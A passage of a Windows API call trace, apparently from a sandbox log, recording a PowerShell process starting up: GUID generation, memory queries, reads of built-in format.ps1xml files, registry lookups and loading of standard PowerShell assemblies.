	[0339.729] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x7c24bcea, Data2=0x8f10, Data3=0x4e72, Data4=([0]=0x84, [1]=0xb4, [2]=0xf6, [3]=0x4a, [4]=0xa9, [5]=0x1a, [6]=0x4c, [7]=0x39))) returned 0x0
	[0339.729] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xe69ca1a8, Data2=0xb774, Data3=0x401e, Data4=([0]=0xb8, [1]=0xcd, [2]=0x17, [3]=0xed, [4]=0xf2, [5]=0xd8, [6]=0x40, [7]=0x85))) returned 0x0
	[0339.729] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x291b1b32, Data2=0xcc52, Data3=0x4f72, Data4=([0]=0xac, [1]=0xb8, [2]=0xe1, [3]=0x55, [4]=0x97, [5]=0xd2, [6]=0x4e, [7]=0xd1))) returned 0x0
	[0339.729] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x4f78fd71, Data2=0x4726, Data3=0x4f2a, Data4=([0]=0x94, [1]=0xf0, [2]=0xa4, [3]=0xe7, [4]=0x28, [5]=0x72, [6]=0x6d, [7]=0x9d))) returned 0x0
	[0339.729] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x9e8752d8, Data2=0x6173, Data3=0x4307, Data4=([0]=0x9f, [1]=0x7e, [2]=0x42, [3]=0x1b, [4]=0xb1, [5]=0x6, [6]=0xb4, [7]=0xbc))) returned 0x0
	[0339.730] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x6318f31d, Data2=0x624c, Data3=0x4baa, Data4=([0]=0x95, [1]=0xc4, [2]=0xd1, [3]=0x29, [4]=0x72, [5]=0xc6, [6]=0x26, [7]=0x6a))) returned 0x0
	[0339.730] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xb5b4bc4c, Data2=0xa877, Data3=0x4688, Data4=([0]=0x9a, [1]=0x31, [2]=0x1, [3]=0x6, [4]=0xf5, [5]=0x43, [6]=0x49, [7]=0x25))) returned 0x0
	[0339.730] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x51c9c5a5, Data2=0xda53, Data3=0x490b, Data4=([0]=0xb3, [1]=0xcc, [2]=0xf8, [3]=0x92, [4]=0x62, [5]=0xa1, [6]=0x9c, [7]=0xe3))) returned 0x0
	[0339.730] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x192873bc, Data2=0x164b, Data3=0x491c, Data4=([0]=0xb5, [1]=0xff, [2]=0x47, [3]=0x6c, [4]=0xfb, [5]=0x76, [6]=0xc8, [7]=0x7f))) returned 0x0
	[0339.730] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x86a8d023, Data2=0x786e, Data3=0x4814, Data4=([0]=0x92, [1]=0x4b, [2]=0xff, [3]=0x53, [4]=0xe0, [5]=0x5, [6]=0xf5, [7]=0x30))) returned 0x0
	[0339.730] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x912d274f, Data2=0xc0eb, Data3=0x44d0, Data4=([0]=0x9c, [1]=0xc2, [2]=0x4f, [3]=0xec, [4]=0x77, [5]=0x12, [6]=0xf2, [7]=0x5f))) returned 0x0
	[0339.731] VirtualQuery (in: lpAddress=0x14bd60, lpBuffer=0x14cc20, dwLength=0x30 | out: lpBuffer=0x14cc20*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.731] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x94c41172, Data2=0xc5eb, Data3=0x44e9, Data4=([0]=0x8e, [1]=0x95, [2]=0xef, [3]=0xf6, [4]=0x12, [5]=0x93, [6]=0xfd, [7]=0x45))) returned 0x0
	[0339.731] VirtualQuery (in: lpAddress=0x14bd60, lpBuffer=0x14cc20, dwLength=0x30 | out: lpBuffer=0x14cc20*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.732] VirtualQuery (in: lpAddress=0x14bd60, lpBuffer=0x14cc20, dwLength=0x30 | out: lpBuffer=0x14cc20*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.732] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x3d7fb5, Data2=0x330a, Data3=0x4e49, Data4=([0]=0xa0, [1]=0xff, [2]=0x96, [3]=0x8a, [4]=0x47, [5]=0x1c, [6]=0x72, [7]=0x3f))) returned 0x0
	[0339.732] VirtualQuery (in: lpAddress=0x14bd60, lpBuffer=0x14cc20, dwLength=0x30 | out: lpBuffer=0x14cc20*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.733] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xe2656c5b, Data2=0x2d54, Data3=0x4934, Data4=([0]=0x86, [1]=0x8, [2]=0xc4, [3]=0xbc, [4]=0xce, [5]=0x7f, [6]=0x49, [7]=0x12))) returned 0x0
	[0339.733] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x65e9ebe, Data2=0xc140, Data3=0x4414, Data4=([0]=0x99, [1]=0x12, [2]=0x97, [3]=0x15, [4]=0x71, [5]=0xba, [6]=0xbc, [7]=0xf6))) returned 0x0
	[0339.733] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xe211ea42, Data2=0x36f2, Data3=0x4cfa, Data4=([0]=0xb3, [1]=0xba, [2]=0xd7, [3]=0xcf, [4]=0xc4, [5]=0x72, [6]=0xd3, [7]=0xb0))) returned 0x0
	[0339.733] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xe6837498, Data2=0xe72b, Data3=0x4480, Data4=([0]=0x8b, [1]=0x38, [2]=0xbf, [3]=0x6d, [4]=0xee, [5]=0x46, [6]=0xd3, [7]=0x9a))) returned 0x0
	[0339.733] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x7fb1f2e6, Data2=0xb92c, Data3=0x4b14, Data4=([0]=0xa6, [1]=0x3d, [2]=0xa6, [3]=0x4d, [4]=0xcf, [5]=0x20, [6]=0x58, [7]=0x2))) returned 0x0
	[0339.733] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x87ac04be, Data2=0xb0aa, Data3=0x47e7, Data4=([0]=0xa7, [1]=0x77, [2]=0x5a, [3]=0xbe, [4]=0xa9, [5]=0xde, [6]=0x64, [7]=0x48))) returned 0x0
	[0339.734] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x2ee0f3ca, Data2=0xbc5a, Data3=0x4534, Data4=([0]=0x8f, [1]=0xe5, [2]=0xe6, [3]=0x33, [4]=0xd3, [5]=0x3e, [6]=0xfb, [7]=0xfb))) returned 0x0
	[0339.734] VirtualQuery (in: lpAddress=0x14bd60, lpBuffer=0x14cc20, dwLength=0x30 | out: lpBuffer=0x14cc20*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.734] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x3c7d7bd7, Data2=0x402f, Data3=0x4910, Data4=([0]=0x8a, [1]=0x53, [2]=0xf6, [3]=0xeb, [4]=0x11, [5]=0xac, [6]=0x9, [7]=0x45))) returned 0x0
	[0339.734] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x97607536, Data2=0xba44, Data3=0x4671, Data4=([0]=0x83, [1]=0x21, [2]=0x1d, [3]=0x62, [4]=0x49, [5]=0xcf, [6]=0x38, [7]=0xa5))) returned 0x0
	[0339.734] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xc0f429ea, Data2=0x2d18, Data3=0x4e46, Data4=([0]=0x9a, [1]=0xf0, [2]=0x63, [3]=0x84, [4]=0x5, [5]=0x26, [6]=0xe7, [7]=0xae))) returned 0x0
	[0339.734] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xd75609eb, Data2=0xab97, Data3=0x475a, Data4=([0]=0x85, [1]=0x4, [2]=0xd3, [3]=0xf6, [4]=0x56, [5]=0x6c, [6]=0x51, [7]=0xc7))) returned 0x0
	[0339.735] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xa9385de0, Data2=0x40ac, Data3=0x4075, Data4=([0]=0xb9, [1]=0xfc, [2]=0xa1, [3]=0xcc, [4]=0xad, [5]=0xb9, [6]=0x5a, [7]=0x6f))) returned 0x0
	[0339.735] VirtualQuery (in: lpAddress=0x14bd60, lpBuffer=0x14cc20, dwLength=0x30 | out: lpBuffer=0x14cc20*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.735] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x10378633, Data2=0x271d, Data3=0x4561, Data4=([0]=0xaa, [1]=0xcc, [2]=0x3e, [3]=0x51, [4]=0x4b, [5]=0x19, [6]=0x79, [7]=0xc7))) returned 0x0
	[0339.735] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x42333194, Data2=0x5b4, Data3=0x4b16, Data4=([0]=0x84, [1]=0x4e, [2]=0x8a, [3]=0x81, [4]=0x8d, [5]=0xac, [6]=0x27, [7]=0xd5))) returned 0x0
	[0339.735] VirtualQuery (in: lpAddress=0x14bdd0, lpBuffer=0x14cc90, dwLength=0x30 | out: lpBuffer=0x14cc90*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.735] VirtualQuery (in: lpAddress=0x14bdd0, lpBuffer=0x14cc90, dwLength=0x30 | out: lpBuffer=0x14cc90*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.735] VirtualQuery (in: lpAddress=0x14bdd0, lpBuffer=0x14cc90, dwLength=0x30 | out: lpBuffer=0x14cc90*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.735] VirtualQuery (in: lpAddress=0x14bdd0, lpBuffer=0x14cc90, dwLength=0x30 | out: lpBuffer=0x14cc90*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.736] SetErrorMode (uMode=0x1) returned 0x1
	[0339.736] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e4
	[0339.736] SetErrorMode (uMode=0x1) returned 0x1
	[0339.736] GetFileType (hFile=0x2e4) returned 0x1
	[0339.736] ReadFile (in: hFile=0x2e4, lpBuffer=0x31c7578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x31c7578*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.737] ReadFile (in: hFile=0x2e4, lpBuffer=0x31c7578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x31c7578*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.737] ReadFile (in: hFile=0x2e4, lpBuffer=0x31c7578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x31c7578*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.737] ReadFile (in: hFile=0x2e4, lpBuffer=0x31c7578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x31c7578*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.737] ReadFile (in: hFile=0x2e4, lpBuffer=0x31c7578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x31c7578*, lpNumberOfBytesRead=0x14d0f8*=0x8b4, lpOverlapped=0x0) returned 1
	[0339.738] ReadFile (in: hFile=0x2e4, lpBuffer=0x31c6994, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x31c6994*, lpNumberOfBytesRead=0x14d0f8*=0x0, lpOverlapped=0x0) returned 1
	[0339.738] ReadFile (in: hFile=0x2e4, lpBuffer=0x31c7578, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x31c7578*, lpNumberOfBytesRead=0x14d0f8*=0x0, lpOverlapped=0x0) returned 1
	[0339.738] SetErrorMode (uMode=0x1) returned 0x1
	[0339.738] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d0a0 | out: lpFileInformation=0x14d0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0339.738] SetErrorMode (uMode=0x1) returned 0x1
	[0339.738] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d188 | out: phkResult=0x14d188*=0x2e4) returned 0x0
	[0339.738] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d10c, lpData=0x0, lpcbData=0x14d108*=0x0 | out: lpType=0x14d10c*=0x1, lpData=0x0, lpcbData=0x14d108*=0x56) returned 0x0
	[0339.738] CoTaskMemAlloc (cb=0x5a) returned 0x1b724740
	[0339.738] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d0dc, lpData=0x1b724740, lpcbData=0x14d0d8*=0x56 | out: lpType=0x14d0dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d0d8*=0x56) returned 0x0
	[0339.738] CoTaskMemFree (pv=0x1b724740) 
	[0339.738] RegCloseKey (hKey=0x2e4) returned 0x0
	[0339.739] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x210fb599, Data2=0xb01, Data3=0x4752, Data4=([0]=0x94, [1]=0xa2, [2]=0xbd, [3]=0x2a, [4]=0x3, [5]=0xd4, [6]=0x4b, [7]=0xce))) returned 0x0
	[0339.739] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x5aa3f1be, Data2=0xee39, Data3=0x4ce2, Data4=([0]=0x9e, [1]=0x47, [2]=0xcc, [3]=0x74, [4]=0xff, [5]=0x55, [6]=0xe8, [7]=0xdf))) returned 0x0
	[0339.739] SetErrorMode (uMode=0x1) returned 0x1
	[0339.739] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e4
	[0339.740] SetErrorMode (uMode=0x1) returned 0x1
	[0339.740] GetFileType (hFile=0x2e4) returned 0x1
	[0339.740] ReadFile (in: hFile=0x2e4, lpBuffer=0x3205360, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x3205360*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.741] ReadFile (in: hFile=0x2e4, lpBuffer=0x3205360, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x3205360*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.741] ReadFile (in: hFile=0x2e4, lpBuffer=0x3205360, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x3205360*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.741] ReadFile (in: hFile=0x2e4, lpBuffer=0x3205360, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x3205360*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.741] ReadFile (in: hFile=0x2e4, lpBuffer=0x3205360, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x3205360*, lpNumberOfBytesRead=0x14d0f8*=0xe98, lpOverlapped=0x0) returned 1
	[0339.741] ReadFile (in: hFile=0x2e4, lpBuffer=0x3204960, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x3204960*, lpNumberOfBytesRead=0x14d0f8*=0x0, lpOverlapped=0x0) returned 1
	[0339.741] ReadFile (in: hFile=0x2e4, lpBuffer=0x3205360, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x3205360*, lpNumberOfBytesRead=0x14d0f8*=0x0, lpOverlapped=0x0) returned 1
	[0339.741] SetErrorMode (uMode=0x1) returned 0x1
	[0339.742] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d0a0 | out: lpFileInformation=0x14d0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0339.742] SetErrorMode (uMode=0x1) returned 0x1
	[0339.742] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d188 | out: phkResult=0x14d188*=0x2e4) returned 0x0
	[0339.742] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d10c, lpData=0x0, lpcbData=0x14d108*=0x0 | out: lpType=0x14d10c*=0x1, lpData=0x0, lpcbData=0x14d108*=0x56) returned 0x0
	[0339.742] CoTaskMemAlloc (cb=0x5a) returned 0x1b724740
	[0339.742] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d0dc, lpData=0x1b724740, lpcbData=0x14d0d8*=0x56 | out: lpType=0x14d0dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d0d8*=0x56) returned 0x0
	[0339.742] CoTaskMemFree (pv=0x1b724740) 
	[0339.742] RegCloseKey (hKey=0x2e4) returned 0x0
	[0339.743] VirtualQuery (in: lpAddress=0x14bc20, lpBuffer=0x14cae0, dwLength=0x30 | out: lpBuffer=0x14cae0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.743] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x176e9ac8, Data2=0x6d05, Data3=0x4809, Data4=([0]=0xae, [1]=0x7e, [2]=0xae, [3]=0xf9, [4]=0x1f, [5]=0x78, [6]=0x74, [7]=0x8d))) returned 0x0
	[0339.743] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x102560df, Data2=0x94a1, Data3=0x4a6f, Data4=([0]=0xb4, [1]=0xb0, [2]=0x41, [3]=0xc3, [4]=0x74, [5]=0x67, [6]=0x32, [7]=0x8a))) returned 0x0
	[0339.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0339.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0339.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0339.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0340.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0340.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0340.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0340.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0340.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0340.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0340.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0340.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0340.669] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0340.669] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0340.669] CoTaskMemFree (pv=0x1f7c30) 
	[0340.671] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0340.671] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0340.671] CoTaskMemFree (pv=0x1f7c30) 
	[0340.672] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0340.673] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0340.673] CoTaskMemFree (pv=0x1f7c30) 
	[0340.674] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
